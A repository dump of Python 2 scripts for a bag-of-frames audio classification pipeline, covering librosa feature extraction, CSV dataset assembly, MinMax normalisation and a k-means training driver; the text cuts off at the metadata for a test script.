channelNum in channels:\n channels[channelNum] = dict(name=channelName, enabled=True)\n \n setPref('channels', channels)\n \n\n####################################################################################################\n\n# TODO: Add day to non-today menus\n# TODO: Link to saved folder\n\ndef MainMenu():\n dir = MediaContainer()\n dir.nocache = 1\n \n if getPref('postalCode') != '' and getPref('provider') != '' and getPref('timeFormat') != '':\n nextTime = getCurrentTimeSlot()\n Plugin.AddPathRequestHandler(PLUGIN_PREFIX, TVMenu, '')\n \n for k in range(24):\n dir.Append(DirectoryItem(nextTime, timeToDisplay(nextTime), thumb=R('blank-black.gif')))\n nextTime = nextTime + 1800\n dir.Append(Function(DirectoryItem(daysMenu, title=L('Another day'), thumb=R('blank-black.gif'))))\n dir.Append(Function(SearchDirectoryItem(searchMenu, title=L('Search'), prompt=L('Enter show name'))))\n \n dir.Append(Function(DirectoryItem(settingsMenu, title=L('Settings'), thumb=R('icon-settings.png'))))\n return dir\n\n#################################################################################################### \n \ndef timeToDisplay(t):\n ''' Turns a POSIX time into a human readable local time'''\n # Adjust to local time\n if time.daylight != 0:\n t = t - time.altzone \n else:\n t = t - time.timezone\n \n t = t % DAY \n hour = (t // 3600) % 24\n minute = (t % 3600) // 60\n #Log(str(hour) + ':' + str(minute))\n if getPref('timeFormat') == '12':\n if hour >= 12:\n meridian = 'PM'\n else:\n meridian = 'AM'\n if hour > 12:\n hour = hour - 12\n if hour == 0:\n hour = 12\n \n else:\n meridian = ''\n \n return str(hour) + ':' + str(minute).zfill(2) + ' ' + meridian\n\ndef getCurrentTimeSlot():\n '''@return current time rounded down to nearest half hour'''\n now = calendar.timegm(time.gmtime())\n now = now - (now % 1800)\n return now\n \ndef meridianRangeTo24hour(s):\n (start, stop) = s.split('-')\n (stopTime, meridian) = re.match(r'(\\d+:\\d+)(\\w\\w)', stop).groups()\n if meridian == 'pm':\n baseHour = 12\n else:\n baseHour = 0\n \n (startHour, startMinute) = start.split(':')\n (stopHour, stopMinute) = stopTime.split(':')\n \n startHour = int(startHour) + baseHour\n stopHour = int(stopHour) + baseHour\n # 11:30-1:30AM -> 11:30-01:30 -> 23:30-01:30\n # 11:30-1:30PM -> 23:30-13:30 -> 11:30-13:30\n if startHour > stopHour: startHour = (startHour - 12) % 24\n \n start24 = str(startHour).zfill(2) + ':' + startMinute\n stop24 = str(stopHour).zfill(2) + ':' + stopMinute\n \n return start24 + '-' + stop24\n\n####################################################################################################\n\ndef searchMenu(sender, query):\n dir = MediaContainer()\n Plugin.AddPathRequestHandler(SEARCH_PREFIX, showMenu, '', '', '')\n \n shows = GetXML(SEARCH_INDEX + String.Quote(query, True), True).xpath('//li[@class=\"zc-sr-l\"]')\n if len(shows) == 0:\n # Here there was only one result\n shows = GetXML(SEARCH_INDEX + String.Quote(query, True), True).xpath('//table[@class=\"zc-episode\"]')\n if len(shows) == 0:\n return movieMenu(SEARCH_INDEX + String.Quote(query, True))\n return grabShows(shows)\n \n # here there were multiple results\n for show in shows:\n name = show.xpath('child::a')[0].text\n description = show.xpath('child::span')[0].text\n link = show.xpath('child::a')[0].get('href')\n dir.Append(DirectoryItem(SEARCH_PREFIX + '/' + String.Encode(link) , title=name + ' ' + description))\n return dir\n\ndef showMenu(pathNouns, path):\n shows = GetXML(SHOW_INDEX + String.Decode(pathNouns[0]), True).xpath('//table[@class=\"zc-episode\"]')\n if len(shows) == 0:\n return movieMenu(SHOW_INDEX + String.Decode(pathNouns[0]))\n return grabShows(shows)\n \n\ndef grabShows(shows):\n dir = MediaContainer()\n dir.viewGroup = 'Details'\n channels = getPref('channels')\n for show in shows:\n name = show.xpath('descendant::span[@class=\"zc-program-episode\"]')[0]\n try:\n name = name.xpath('child::a')[0].text\n except:\n name = name.text.strip()\n description = show.xpath('descendant::span[@class=\"zc-program-description\"]')[0].text + '\\n'\n times = show.xpath('descendant::table[@class=\"zc-episode-times\"]')[0].xpath('descendant::tr')\n for aTime in times:\n channel = aTime.xpath('child::td[@class=\"zc-channel\"]')[0]\n if channel.text != None:\n channel = channel.text\n else:\n channel = channel.xpath('child::span')[0].text\n #Log(channel)\n if channels[int(channel)]['enabled']:\n description = description + '\\n' + aTime.xpath('child::td[@class=\"zc-sche-date\"]')[0].text \n \n timeRange = aTime.xpath('child::td[@class=\"zc-sche-time\"]')[0].text\n if getPref('timeFormat') == '24':\n timeRange = meridianRangeTo24hour(timeRange)\n description = description + ' ' + timeRange\n description = description + ' ' + channel\n channelName = aTime.xpath('child::td[@class=\"zc-callsign\"]')[0]\n try:\n description = description + ' ' + channelName.text\n except:\n description = description + ' ' + channelName.xpath('child::span')[0].text\n dir.Append(Function(DirectoryItem(noMenu, title=name, summary=description)))\n return dir\n \ndef movieMenu(url):\n dir = MediaContainer()\n dir.viewGroup = 'Details'\n page = GetXML(url, True)\n name = page.xpath('//h1[@id=\"zc-program-title\"]')[0].text\n description = page.xpath('//p[@id=\"zc-program-description\"]')[0].text + '\\n\\n'\n channels = getPref('channels')\n for aTime in page.xpath('//div[@id=\"zc-sc-ep-list\"]')[0].xpath('child::ol[starts-with(@class,\"zc-sc-ep-list-r\")]'):\n channel = aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-chn\"]')[0].text\n if channels[int(channel)]['enabled']:\n description = description + ' ' + aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-wd\"]')[0].text\n description = description + ' ' + aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-md\"]')[0].text\n \n timeRange = aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-stet\"]')[0].text\n if getPref('timeFormat') == '24':\n timeRange = meridianRangeTo24hour(timeRange)\n description = description + ' ' + timeRange\n \n description = description + ' ' + channel\n description = description + ' ' + aTime.xpath('descendant::li[@class=\"zc-sc-ep-list-l zc-sc-ep-list-call\"]')[0].text + '\\n'\n dir.Append(Function(DirectoryItem(noMenu, title=name, summary=description)))\n return dir\n \n####################################################################################################\n\ndef settingsMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Settings')\n dir.nocache = 1\n dir.Append(Function(SearchDirectoryItem(setPostalCode, title=L('PostalCodeTitle'), prompt=L('PostalCodePrompt'))))\n if getPref('postalCode') != '':\n dir.Append(Function(PopupDirectoryItem(providerMenu, title=L('Provider'))))\n if getPref('provider') != '': \n dir.Append(Function(PopupDirectoryItem(timeFormatMenu, title=L('Time Format'))))\n dir.Append(Function(PopupDirectoryItem(inProgressMenu, title=L('Shows in progress'))))\n #if len(hideChannelsMenu(0)) != 0:\n dir.Append(Function(DirectoryItem(hideChannelsMenu, title=L('Hide Channels'))))\n #if len(showChannelsMenu(0)) != 0:\n dir.Append(Function(DirectoryItem(showChannelsMenu, title=L('Show Channels'))))\n dir.Append(Function(DirectoryItem(AddFavouritesMenu, title=('Add Favourites'))))\n dir.Append(Function(PopupDirectoryItem(collapseShowsMenu, title=L('Duplicates'))))\n \n favourites = getPref('favourites')\n if len(favourites) != 0:\n dir.Append(Function(DirectoryItem(RemoveFavouritesMenu, title=L('Remove Favourites'))))\n return dir\n\n####################################################################################################\n \ndef setPostalCode(sender, query):\n query = string.join(query.split(' '),'') # No spaces please\n setPref('postalCode', query)\n return\n \n####################################################################################################\n\ndef providerMenu(sender):\n dir = MediaContainer()\n url = 'http://tvlistings.zap2it.com/tvlistings/ZBChooseProvider.do?zipcode=' + getPref('postalCode') + '&method=getProviders'\n providers = XML.ElementFromString(HTTP.Request(url=url, cacheTime=CACHE_TIME), True).xpath('//a[starts-with(@href, \"ZCGrid.do?method=decideFwdForLineup\")]')\n for provider in providers:\n dir.Append(Function(DirectoryItem(setProvider, title=provider.text)))\n return dir\n \ndef setProvider(sender):\n Log(sender.itemTitle)\n url = 'http://tvlistings.zap2it.com/tvlistings/ZBChooseProvider.do?zipcode=' + getPref('postalCode') + '&method=getProviders'\n\n setProviderURL = XML.ElementFromString(HTTP.Request(url=url, cacheTime=CACHE_TIME), True).xpath('//a[text() = \"' + sender.itemTitle + '\"]')[0].get('href')\n #Log(re.search(r'lineupId=(.*)', setProviderURL).group(1))\n #Log(type(re.search(r'lineupId=(.*)', setProviderURL).group(1)))\n setPref('provider', re.search(r'lineupId=(.*)', setProviderURL).group(1))\n \n UpdateCache()\n return\n\n####################################################################################################\n\ndef timeFormatMenu(sender):\n dir = MediaContainer()\n dir.Append(Function(DirectoryItem(setTimeFormat, title='12' + L('hour'))))\n dir.Append(Function(DirectoryItem(setTimeFormat, title='24' + L('hour'))))\n return dir\n\ndef setTimeFormat(sender):\n timeFormat = re.match(r'(\\d\\d).*', sender.itemTitle).group(1)\n setPref('timeFormat', timeFormat)\n return\n \n####################################################################################################\n\ndef inProgressMenu(sender):\n dir = MediaContainer()\n dir.Append(Function(DirectoryItem(setInProgress, title=L('Show'))))\n dir.Append(Function(DirectoryItem(setInProgress, title=L('Hide'))))\n return dir\n\ndef setInProgress(sender):\n if sender.itemTitle == L('Show'):\n setPref('inProgress', True)\n else:\n setPref('inProgress', False)\n return\n \n####################################################################################################\n\ndef collapseShowsMenu(sender):\n dir = MediaContainer()\n dir.Append(Function(DirectoryItem(setCollapse, title=L('Show'))))\n dir.Append(Function(DirectoryItem(setCollapse, title=L('Hide'))))\n return dir\n \ndef setCollapse(sender):\n if sender.itemTitle == L('Show'):\n v = False\n else:\n v = True\n setPref('collapseShows', v)\n \n return\n\n####################################################################################################\n\ndef hideChannelsMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Hide Channels')\n dir.nocache = 1\n if sender == 0: dir.replaceParent = 1\n channels = getPref('channels')\n channelList = channels.keys()\n channelList.sort()\n for channel in channelList:\n if channels[channel]['enabled']:\n dir.Append(Function(DirectoryItem(hideChannel, title=str(channel) + ' ' + channels[channel]['name'])))\n return dir\n \ndef hideChannel(sender):\n (num, name) = sender.itemTitle.split(' ')\n channels = getPref('channels')\n channels[int(num)]['enabled'] = False\n setPref('channels', channels)\n return hideChannelsMenu(0)\n\n####################################################################################################\n\ndef showChannelsMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Show Channels')\n dir.nocache = 1\n channels = getPref('channels')\n channelList = channels.keys()\n channelList.sort()\n for channel in channelList:\n if not channels[channel]['enabled']:\n dir.Append(Function(DirectoryItem(showChannel, title=str(channel) + ' ' + channels[channel]['name'])))\n return dir\n \ndef showChannel(sender):\n (num, name) = sender.itemTitle.split(' ')\n channels = getPref('channels')\n channels[int(num)]['enabled'] = True\n setPref('channels', channels)\n return\n\n####################################################################################################\n\ndef AddFavouritesMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Add Favourites')\n dir.nocache = 1\n favourites = getPref('favourites') \n try:\n if len(AddFavouritesMenu.allShows) != 0:\n for show in AddFavouritesMenu.allShows:\n if not show in favourites:\n dir.Append(Function(DirectoryItem(addFavourite, title=show)))\n return dir \n except AttributeError:\n AddFavouritesMenu.allShows = list()\n slots = Dict.Get('shows')\n #showNames = list()\n \n for slot in slots.itervalues():\n for listing in slot:\n name = listing['title']\n if not name in AddFavouritesMenu.allShows and not name in favourites:\n AddFavouritesMenu.allShows.append(name)\n AddFavouritesMenu.allShows.sort()\n for showName in AddFavouritesMenu.allShows:\n dir.Append(Function(DirectoryItem(addFavourite, title=showName)))\n return dir\n \ndef addFavourite(sender):\n favourites = getPref('favourites')\n favourites.append(sender.itemTitle)\n setPref('favourites', favourites)\n return\n\n####################################################################################################\n \ndef RemoveFavouritesMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Remove Favourites')\n dir.nocache = 1\n favourites = getPref('favourites')\n favourites.sort()\n for favourite in favourites:\n dir.Append(Function(DirectoryItem(removeFavourite, title=favourite)))\n return dir\n\ndef removeFavourite(sender):\n favourites = getPref('favourites')\n favourites.remove(sender.itemTitle)\n setPref('favourites', favourites)\n return\n \n####################################################################################################\n\ndef grabListings(t, shows):\n '''Reads group of guide listings\n @param t: start time\n @param shows: currently known listings'''\n url = PROVIDER_INDEX + '&zipcode=' + getPref('postalCode') + '&lineupId=' + getPref('provider') + '&fromTimeInMillis=' + str(t) + '000'\n for td in GetXML(url, True).xpath('//td[starts-with(@class,\"zc-pg\")]'):\n try: showName = td.xpath('child::a')[0].text.encode('ascii','ignore')\n except: showName = ''\n try: description = td.xpath('child::p')[0].text.encode('ascii','ignore')\n except: description = ''\n \n if (showName != '' or description != ''):\n try:\n channel = td.xpath('parent::*')[0].xpath('child::td[@class=\"zc-st\"]')[0]\n channelNum = channel.xpath('descendant::span[@class=\"zc-st-n\"]')[0].text\n channelName = channel.xpath('descendant::span[@class=\"zc-st-c\"]')[0].text\n isValidChannel = True\n except:\n Log('Get channel failed:' + showName + ' ' + description)\n isValidChannel = False\n \n if isValidChannel:\n try:\n releaseYear = td.xpath('child::span[@class=\"zc-pg-y\"]')[0].text\n showName = showName + ' ' + releaseYear\n except: pass\n try:\n episodeName = td.xpath('child::span[@class=\"zc-pg-e\"]')[0].text\n description = episodeName + '\\n\\n' + description\n except: pass\n \n startTime = int(re.search(r'(?:([^,]+),)*', td.get('onclick')).group(1)) // 1000\n startSlot = startTime - (startTime % 1800)\n duration = int(re.search(r'(\\d+)\\)', td.get('onclick')).group(1)) * 60 # minutes->seconds\n endTime = startTime + duration\n endSlot = endTime - (endTime % 1800)\n \n if not startSlot in shows: shows[startSlot] = list()\n shows[startSlot].append(dict(title=showName, channelNum=channelNum, channelName=channelName, start=startTime, end=endTime, summary=description, inProgress=False))\n for slot in range(startSlot + 1800, endSlot, 1800):\n if not slot in shows: shows[slot] = list()\n shows[slot].append(dict(title=showName, channelNum=channelNum, channelName=channelName, start=startTime, end=endTime, summary=description, inProgress=True))\n\n####################################################################################################\n\ndef TVMenu(pathNouns, path):\n dir = MediaContainer()\n dir.viewGroup = 'Details'\n menuTime = int(pathNouns[0])\n dir.title2 = timeToDisplay(menuTime)\n dir.nocache = 1\n \n listings = Dict.Get('shows')\n if not menuTime in listings:\n grabListings(menuTime, listings)\n listings = listings[menuTime]\n \n collapse = getPref('collapseShows')\n if collapse:\n keyDict = dict()\n \n displayInProgress = getPref('inProgress')\n channels = getPref('channels')\n favourites = getPref('favourites')\n hits = list()\n misses = list()\n for listing in listings:\n timeString = timeToDisplay(listing['start']) + ' - ' + timeToDisplay(listing['end'])\n if (displayInProgress or not listing['inProgress']) and channels[int(listing['channelNum'])]['enabled']:\n # check if we should collapse it\n listingKey = (frozenset([listing['title'], listing['summary'], listing['start'], listing['end']]))\n if not collapse or listingKey not in keyDict:\n keyDict[listingKey] = '' \n newItem = Function(DirectoryItem(noMenu, title=listing['title'], subtitle=listing['channelNum'] + ' ' + listing['channelName'] + ' ' + timeString, summary=listing['summary']))\n if listing['title'] in favourites:\n hits.append(newItem)\n else:\n misses.append(newItem)\n \n for hit in hits:\n dir.Append(hit)\n for miss in misses:\n dir.Append(miss)\n\n return dir\n \n####################################################################################################\n\ndef daysMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Days')\n Plugin.AddPathRequestHandler(DAY_PREFIX, dayMenu, '', '', '')\n\n (year, month, day) = datetime.datetime.today().timetuple()[0:3]\n dayOfWeek = calendar.weekday(year, month, day)\n \n midnight = datetime.datetime.fromordinal(datetime.datetime.now().toordinal())\n midnight = calendar.timegm(midnight.timetuple())\n if time.daylight != 0:\n midnight = midnight + time.altzone \n else:\n midnight = midnight + time.timezone\n\n\n for dayCount in range(7):\n dir.Append(DirectoryItem(DAY_PREFIX + '/' + str(midnight), title=calendar.day_name[dayOfWeek]))\n dayOfWeek = (dayOfWeek + 1) % 7\n midnight = midnight + DAY\n\n return dir\n\ndef dayMenu(pathNouns, path):\n dir = MediaContainer() \n Plugin.AddPathRequestHandler(PLUGIN_PREFIX, TVMenu, '', '', '')\n \n nextTime = int(pathNouns[0])\n for k in range(48):\n dir.Append(DirectoryItem(PLUGIN_PREFIX + '/' + str(nextTime), timeToDisplay(nextTime), '',''))\n nextTime = nextTime + 1800\n return dir\n\n####################################################################################################\n\ndef noMenu(sender):\n pass\n\n####################################################################################################\n\ndef GetXML(theUrl, use_html_parser=False):\n return XML.ElementFromString(HTTP.Request(url=theUrl, cacheTime=CACHE_TIME), use_html_parser)\n\n####################################################################################################\n\ndef setPref(id, value):\n Prefs.Set(id, pickle.dumps(value))\n\ndef getPref(id):\n return pickle.loads(Prefs.Get(id))\n \ndef addPref(id, kind, default, name):\n Prefs.Add(id, kind, pickle.dumps(default), name)\n \n####################################################################################################\n"
}
] | 2 |
SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach
|
https://github.com/SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach
|
c05b7f2afba6fbc670be32a690df43786cfad785
|
c4973f76188d44a3a9f77073c50d009cb21653b9
|
5dceb6c469890544e429426a18137afacf439702
|
refs/heads/master
| 2021-01-11T16:01:26.779881 | 2017-01-16T10:08:51 | 2017-01-16T10:08:51 | 79,984,678 | 1 | 0 | null | 2017-01-25T05:04:22 | 2017-01-25T05:03:08 | 2017-01-16T10:08:51 | null |
[
{
"alpha_fraction": 0.6641891598701477,
"alphanum_fraction": 0.6662161946296692,
"avg_line_length": 23.128204345703125,
"blob_id": "ae61960c4f8fdcb11b87c71a39645d04c44f276b",
"content_id": "925ecde7d0de813924cdcdca9403a7349159df20",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2960,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 117,
"path": "/src/retrieve_audio_features.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "\r\nimport librosa\r\n\r\nimport numpy as np\r\n\r\nimport os\r\nimport shutil\r\nimport sys\r\n\r\nsourceFolder = \"Data\"\r\n\r\n\r\ndef get_features(y,sr):\r\n\tn_fft = sys.argv[1]\r\n\r\n\tif n_fft.isdigit() == False:\r\n\t\t\"Window length has to be an integer\"\r\n\t\tsys.exit()\r\n\r\n\tn_fft = int(n_fft)\t\r\n\thop_length =n_fft/4\r\n\r\n\tfeatures = None\r\n\r\n\t#MFCCS\r\n\tmfccs = librosa.feature.mfcc(y=y, sr=sr, n_mfcc = 60 , n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = mfccs\r\n\r\n\t#Delta mfccs\r\n\tdelta_mfccs = librosa.feature.delta(mfccs)\r\n\tfeatures = np.concatenate((features,delta_mfccs))\r\n\r\n\r\n\t#rmse\r\n\trmse = librosa.feature.rmse(y=y , n_fft = n_fft , hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,rmse))\r\n\r\n\r\n\t#spectral centroid\r\n\tspectral_centroid = librosa.feature.spectral_centroid(y=y, sr=sr, n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,spectral_centroid))\r\n\r\n\r\n\t#spectral badwidth\r\n\tspectral_bandwidth = librosa.feature.spectral_bandwidth(y=y, sr=sr, n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,spectral_bandwidth))\r\n\r\n\r\n\t#spectral contrast\r\n\tspectral_contrast = librosa.feature.spectral_contrast(y=y, sr=sr, n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,spectral_contrast))\r\n\r\n\r\n\t#spectral rolloff\r\n\tspectral_rolloff = librosa.feature.spectral_rolloff(y=y, sr=sr, n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,spectral_rolloff))\r\n\r\n\r\n\r\n\t#zero crossing rate\r\n\tzero_crossing_rate = librosa.feature.zero_crossing_rate(y=y, frame_length = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,zero_crossing_rate))\r\n\r\n\r\n\treturn np.transpose(features)\r\n\r\n\r\n\r\n\r\nif os.path.exists(sourceFolder):\r\n\r\n\tsourceFolderFullPath = os.path.abspath(sourceFolder)\r\n\r\n\tif os.path.exists(\"Temp\"):\r\n\t\tshutil.rmtree(\"Temp\")\r\n\t\r\n\tos.makedirs(\"Temp\")\r\n\r\n\r\n\r\n\tdirs = os.listdir(sourceFolderFullPath)\r\n\r\n\tif dirs != []:\r\n\r\n\t\tfor dir in dirs:\r\n\t\t\ttry:\r\n\t\t\t\tlabel = int(dir)\r\n\t\t\texcept:\r\n\t\t\t\t\"The labels given to the categories should be numerical.\"\r\n\t\t\t\tsys.exit()\r\n\r\n\t\t\taudioTrainPath = \"{}/{}/train\".format(sourceFolderFullPath,dir)\r\n\t\t\taudioTestPath = \"{}/{}/test\".format(sourceFolderFullPath,dir)\r\n\r\n\t\t\tprint \"Retrieving audio features of category {}\".format(label)\r\n\t\t\t\r\n\t\t\tfor subdir in [audioTrainPath,audioTestPath]:\r\n\r\n\t\t\t\tcsvSubdir = subdir.replace(\"Data\",\"Temp\\\\csv\")\r\n\t\t\t\tos.makedirs(csvSubdir)\r\n\t\t\t\r\n\t\t\t\tfor file in os.listdir(subdir):\r\n\t\t\t\t\tif \"ogg\" in file or \"wav\" in file:\r\n\t\t\t\t\t\tsoundFileFullPath = os.path.join(subdir,file)\r\n\t\t\t\t\t\tfeaturesFile = file.replace(\".ogg\",\"\")\r\n\t\t\t\t\t\ty,sr = librosa.load(soundFileFullPath)\r\n\t\t\t\t\t\tfeatures = get_features(y,sr)\r\n\r\n\r\n\t\t\t\t\t\tfeaturesFileFullPath = os.path.join(csvSubdir,\"{}.csv\".format(featuresFile))\r\n\t\t\t\t\t\tnp.savetxt(featuresFileFullPath,features,fmt='%1.3f',delimiter=\",\")\r\n\r\n\r\n\telse:\r\n\t\t\"The Data directory is empty\"\r\n\r\nelse:\r\n\tprint \"The Data path doesn't exist\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.7026647925376892,
"alphanum_fraction": 0.7082749009132385,
"avg_line_length": 23.802326202392578,
"blob_id": "5e8a37c3da29c3f2da0fa1419a393927d52f5120",
"content_id": "09fd36c0a504ae696250967cf661c25f4e823d10",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2139,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 86,
"path": "/src/generate_training_test_data.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "\nimport os\nimport numpy as np \n\nprint \"\\n Generating Training and Test Data\"\n\nsourceFolder = \"Temp//csv\"\nsourceFolderFullPath = os.path.abspath(sourceFolder)\n\n\ndirs = os.listdir(sourceFolderFullPath)\n\n\n#getting training data\nfeatures = None\nlabels = None\nfor dir in dirs:\n\tlabel = int(dir)\n\n\tfeaturesTrainPath = \"{}/{}/train\".format(sourceFolderFullPath,dir)\n\n\tfor file in os.listdir(featuresTrainPath):\n\t\tif \"csv\" in file :\n\t\t\tfeaturesFileFullPath = os.path.join(featuresTrainPath,file)\n\n\t\t\ttemp_features = np.loadtxt(featuresFileFullPath,delimiter = \",\")\n\n\t\t\t#remove rows with nan values \n\t\t\ttemp_features = temp_features[~np.isnan(temp_features).any(axis=1)]\n\n\t\t\ttemp_labels = [label]*temp_features.shape[0]\n\t\t\ttemp_labels = np.expand_dims(temp_labels,axis = 1)\n\n\n\t\t\tif features is None:\n\t\t\t\tfeatures = temp_features\n\t\t\t\tlabels = temp_labels\n\t\t\telse:\n\t\t\t\tfeatures = np.concatenate((features,temp_features))\n\t\t\t\tlabels = np.concatenate((labels,temp_labels))\n\n\nprint \"Total Training Frames : {}\".format(features.shape[0])\n\n\nnp.savetxt(\"Temp\\\\features_train.csv\",features,fmt='%1.3f',delimiter=\",\")\nnp.savetxt(\"Temp\\\\labels_train.csv\",labels,delimiter = \",\")\n\n\n\n#getting test data\nfeatures = None\nlabels = None\nfor dir in dirs:\n\tlabel = int(dir)\n\n\tfeaturesTestPath = \"{}/{}/test\".format(sourceFolderFullPath,dir)\n\n\tfor file in os.listdir(featuresTestPath):\n\t\tif \"csv\" in file :\n\t\t\tfeaturesFileFullPath = os.path.join(featuresTestPath,file)\n\n\t\t\ttemp_features = np.loadtxt(featuresFileFullPath,delimiter = \",\")\n\n\t\t\t#remove rows with nan values \n\t\t\ttemp_features = temp_features[~np.isnan(temp_features).any(axis=1)]\n\n\t\t\ttemp_labels = [label]*temp_features.shape[0]\n\t\t\ttemp_labels = np.expand_dims(temp_labels,axis = 1)\n\n\n\t\t\tif features is None:\n\t\t\t\tfeatures = temp_features\n\t\t\t\tlabels = temp_labels\n\t\t\telse:\n\t\t\t\tfeatures = np.concatenate((features,temp_features))\n\t\t\t\tlabels = np.concatenate((labels,temp_labels))\n\n\n\n\nnp.savetxt(\"Temp\\\\features_test.csv\",features,fmt='%1.3f',delimiter=\",\")\nnp.savetxt(\"Temp\\\\labels_test.csv\",labels,delimiter = \",\")\n\nprint \"Total Test Frames : {}\".format(features.shape[0])\n\nprint \"Features Generated\"\n\n\n\t\t\t"
},
{
"alpha_fraction": 0.6956181526184082,
"alphanum_fraction": 0.7018779516220093,
"avg_line_length": 24.5,
"blob_id": "a93ffd831e0a892766562436db9186743895db05",
"content_id": "c1874fa1d58558c57a2d0b3f022eef1dfaff0a78",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1278,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 48,
"path": "/src/train.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "\r\nimport sys \r\nimport subprocess\r\n\r\n\r\nif len(sys.argv) != 3:\r\n\tprint \"\\nArguements not valid\\npython train.py window_length clusters \"\r\n\tsys.exit()\r\n\r\nwindow_length = sys.argv[1]\r\n\r\nif window_length.isdigit() == False:\r\n\t\"Window length has to be an integer\"\r\n\tsys.exit()\r\n\r\n\r\n#Retrieving features from the audio files.\r\ncommand_run = subprocess.call(\"python retrieve_audio_features.py {}\".format(window_length))\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n#Generating the training and test data set\r\ncommand_run = subprocess.call(\"python generate_training_test_data.py\")\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n\r\n#normalizing the training dataset\r\ncommand_run = subprocess.call(\"python normalizer.py\")\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n# no of clusters for kmenas clustering \r\nclusters = sys.argv[2]\r\n\r\nif clusters.isdigit() == False:\r\n\t\"No of clusters has to be an integer\"\r\n\tsys.exit()\r\n\r\n\r\n# running kmeans clustering algo on the normalized data\r\ncommand_run = subprocess.call(\"python kmeans_train.py {}\".format(clusters))\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n# derived features after taking the bag of frames for each of the audio file.\r\ncommand_run = subprocess.call(\"python generate_derived_training_test_data.py {}\".format(clusters))\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.7202572226524353,
"alphanum_fraction": 0.7202572226524353,
"avg_line_length": 22.8799991607666,
"blob_id": "aa09db1ed5ec700ade2cde4cca302ae9a79867f2",
"content_id": "9a6453667d984483cbfc2d5f7f914fe018b06056",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 622,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 25,
"path": "/src/normalizer.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport os \r\n\r\nprint \"\\n Normalizing training data for kmeans clustering...\"\r\n\r\nDATA_SOURCE = \"Temp\\\\features_train.csv\"\r\nNORMALIZER_FILENAME = \"kmeans_normalizer.p\"\r\n\r\nif os.path.exists(DATA_SOURCE):\r\n\tfeatures = np.loadtxt(DATA_SOURCE,delimiter = \",\")\r\n\r\n\tfrom sklearn.preprocessing import MinMaxScaler\r\n\tnormalizer = MinMaxScaler()\r\n\tnormalizer.fit(features)\r\n\r\n\r\n\r\n\timport pickle\r\n\twith open(\"Temp\\\\{}\".format(NORMALIZER_FILENAME),\"wb\") as outfile:\r\n\t\tpickle.dump(normalizer,outfile)\r\n\t\r\n\tprint \"kmeans normalizer saved\"\r\n\r\nelse:\r\n\tprint \"No file features_train.csv, Generate the features first.\"\r\n"
},
{
"alpha_fraction": 0.69532310962677,
"alphanum_fraction": 0.7032796144485474,
"avg_line_length": 35.16245651245117,
"blob_id": "8ae6850bd6418ff7eabdd739e4a4b668791e5590",
"content_id": "6b9ed9cafeb4af25428f337e4a8fcc52209d647a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10306,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 277,
"path": "/src/test.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
